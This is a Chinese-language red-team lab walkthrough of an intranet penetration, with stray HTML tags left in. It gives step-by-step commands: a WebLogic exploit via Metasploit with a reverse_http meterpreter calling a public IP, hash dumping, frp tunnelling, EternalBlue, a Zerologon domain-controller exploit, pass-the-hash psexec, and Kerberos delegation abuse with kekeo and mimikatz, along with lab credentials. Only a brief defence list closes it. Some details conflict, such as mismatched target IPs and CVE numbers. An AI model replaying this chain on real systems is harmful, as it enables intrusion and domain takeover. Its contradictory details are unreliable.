内网渗透实战教学文档<\/h1>

一、环境搭建<\/h2>

本次内网靶场环境包含多种关键角色的机器，具体配置如下：<\/p>

Web服务器<\/strong>：<\/p>

外网IP：192.168.3.80<\/li>
内网IP：10.10.10.80<\/li>
角色：承担对外提供服务与内网数据交互<\/li> <\/ul> <\/li>

域内机器Win7<\/strong>：<\/p>

外网IP：192.168.3.201<\/li>
内网IP：10.10.10.201<\/li>
角色：域内普通客户端<\/li> <\/ul> <\/li>

域内服务器Mssql<\/strong>：<\/p>

仅内网IP：10.10.10.80<\/li>
角色：数据库相关服务<\/li> <\/ul> <\/li>

域控机器<\/strong>：<\/p>

内网IP：10.10.10.10<\/li>
角色：整个域环境的核心管理设备<\/li> <\/ul> <\/li> <\/ul>
二、外网渗透<\/h2>
1. 端口扫描与目录扫描<\/h3>

使用专业扫描工具对目标192.168.0.100进行端口扫描探测<\/li>
发现开放7001端口（Weblogic默认端口）<\/li>
执行目录扫描，探测到Weblogic登录口<\/li> <\/ol>
2. Weblogic漏洞利用<\/h3>

尝试常见弱口令登录失败<\/li>
使用Weblogic漏洞利用工具检测<\/li>
发现存在CVE-2020-2551漏洞（远程代码执行）<\/li>
漏洞利用步骤：

使用Metasploit搜索相关漏洞模块：search CVE-2019-2725<\/code><\/li>
选择本地payload注入模块：use exploit\/windows\/local\/payload_inject<\/code><\/li>
设置payload类型：set payload windows\/meterpreter\/reverse_http<\/code><\/li>
设置监听主机和端口：set LHOST 103.234.72.5<\/code>，set LPORT 84<\/code><\/li>
指定会话：set session 2<\/code><\/li>
禁止产生新handler：set DisablePayloadHandler true<\/code><\/li> <\/ul> <\/li> <\/ol> 3. 出网探测与杀软识别<\/h3> 出网探测：ping www.baidu.com<\/code>（确认目标能出网）<\/li> 杀软识别：tasklist \/svc<\/code>（确认无杀毒软件）<\/li> <\/ol> 4. 获取Shell与反弹<\/h3> 利用MSF获取目标shell<\/li> 反弹至Cobalt Strike<\/li> 确认获取到meterpreter会话<\/li> <\/ol> 三、提权上线与内网渗透<\/h2> 1. 信息搜集与密码凭据抓取<\/h3> 发现双网卡配置（内外网并存）<\/li> 使用hashdump<\/code>抓取密码：获取hash值：aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0<\/code><\/li> 通过cmd5网站解密得到明文密码：1qaz@wsx<\/code><\/li> <\/ul> <\/li> <\/ol> 2. 横向移动<\/h3> 上传fscan工具扫描10网段发现10.10.20.7存在MS17-010漏洞<\/li> <\/ul> <\/li> 使用CS自带的portscan进行扫描<\/li> 尝试使用mimikatz获取域管密码<\/li> <\/ol> 3. 隧道搭建与攻击<\/h3> 上传frp搭建隧道代理配置frpc和frps<\/li> <\/ul> <\/li> 修改proxychains.conf： socks5 127.0.0.1 1080<\/code><\/li> <\/ul> <\/li> 使用proxychains启动msf： proxychains msfconsole<\/code><\/li> <\/ul> <\/li> 调用永恒之蓝模块： use exploit\/windows\/smb\/ms17_010_eternalblue<\/code><\/li> 成功获取目标shell<\/li> <\/ul> <\/li> <\/ol> 4. 中转上线与内网扫描<\/h3> 以跳板机作为中转，新建监听器<\/li> 使用psexec进行上线操作<\/li> 内网扫描发现存活主机： 10.10.10.8<\/li> 10.10.10.18<\/li> <\/ul> <\/li> 确认域环境： net user \/domain<\/code><\/li> <\/ul> <\/li> 定位域控： net group "domain controllers" \/domain<\/code><\/li> 通常DNS服务器即为域控<\/li> <\/ul> <\/li> <\/ol> 四、域控攻击<\/h2> 1. CVE-2020-1472漏洞利用<\/h3> 受影响系统版本<\/strong>：<\/p> Windows Server 2008 R2 SP1<\/li> Windows Server 2012\/2012 R2<\/li> Windows Server 2016\/2019<\/li> Windows Server version 1903\/1909\/2004<\/li> <\/ul> 利用步骤<\/strong>：<\/p> 重置管理员密钥置空：<\/p> python3 cve-2020-1472-exploit.py OWA 10.10.10.8 <\/span><\/span><\/code><\/pre><\/li> 通过Dcsync查看密码hash：<\/p> python secretsdump.py redteam.red\/OWA$@10.10.10.8 -just-dc -no-pass <\/span><\/span><\/code><\/pre><\/li> 通过psexec和hash获取shell：<\/p> python psexec.py administrator@10.10.10.8 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7 <\/span><\/span><\/code><\/pre><\/li> 使用secretsdump解析本地nt hash<\/p> <\/li> 恢复原始nt hash：<\/p> python reinstall_original_pw.py OWA 10.10.10.8 8623dc75ede3ca9ec11f2475b12ef96d <\/span><\/span><\/code><\/pre><\/li> <\/ol> 2. 约束委派接管域控<\/h3> 使用AdFind寻找约束委派用户：<\/p> AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red"<\/span> -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))"<\/span> cn distinguishedName msds-allowedtodelegateto <\/span><\/span><\/code><\/pre><\/li> 发现sqlserver机器(10.10.10.18)<\/p> <\/li> 使用fscan扫描发现sqlserver弱口令：sa\/sa<\/p> <\/li> 使用SharpSQLTools查看权限：<\/p> SharpSQLTools.exe 10.10.10.18 sa sa master xp_cmdshell whoami <\/span><\/span><\/code><\/pre><\/li> 上线CS并抓取sqlserver密码：redteam\sqlserver:Server12345<\/code><\/p> <\/li> 利用kekeo和mimikatz接管域控：<\/p> (1) 请求TGT：<\/p> kekeo.exe "tgt::ask \/user:sqlserver \/domain:redteam.red \/password:Server12345 \/ticket:administrator.kirbi"<\/span> <\/span><\/span><\/code><\/pre>(2) 获取域机器ST：<\/p> kekeo.exe "tgs::s4u \/tgt:TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi \/user:Administrator@redteam.red \/service:cifs\/owa.redteam.red"<\/span> <\/span><\/span><\/code><\/pre>(3) 使用mimikatz导入ST：<\/p> mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi <\/span><\/span><\/code><\/pre><\/li> 成功获取域控权限<\/p> <\/li> <\/ol> 五、关键工具总结<\/h2> 扫描工具<\/strong>：<\/p> fscan：内网扫描<\/li> portscan：Cobalt Strike内置扫描<\/li> <\/ul> <\/li> 漏洞利用工具<\/strong>：<\/p> Metasploit Framework<\/li> CVE-2020-1472利用脚本<\/li> EternalBlue利用模块<\/li> <\/ul> <\/li> 横向移动工具<\/strong>：<\/p> psexec<\/li> mimikatz<\/li> SharpSQLTools<\/li> <\/ul> <\/li> 域渗透工具<\/strong>：<\/p> AdFind<\/li> kekeo<\/li> secretsdump<\/li> <\/ul> <\/li> 隧道工具<\/strong>：<\/p> frp<\/li> proxychains<\/li> <\/ul> <\/li> <\/ol> 六、防御建议<\/h2> 及时修补已知漏洞（如CVE-2020-1472、MS17-010）<\/li> 禁用不必要的服务端口<\/li> 加强密码策略，避免弱口令<\/li> 限制约束委派配置<\/li> 部署终端防护和EDR解决方案<\/li> 监控异常网络流量和登录行为<\/li> 定期进行安全审计和渗透测试<\/li> <\/ol>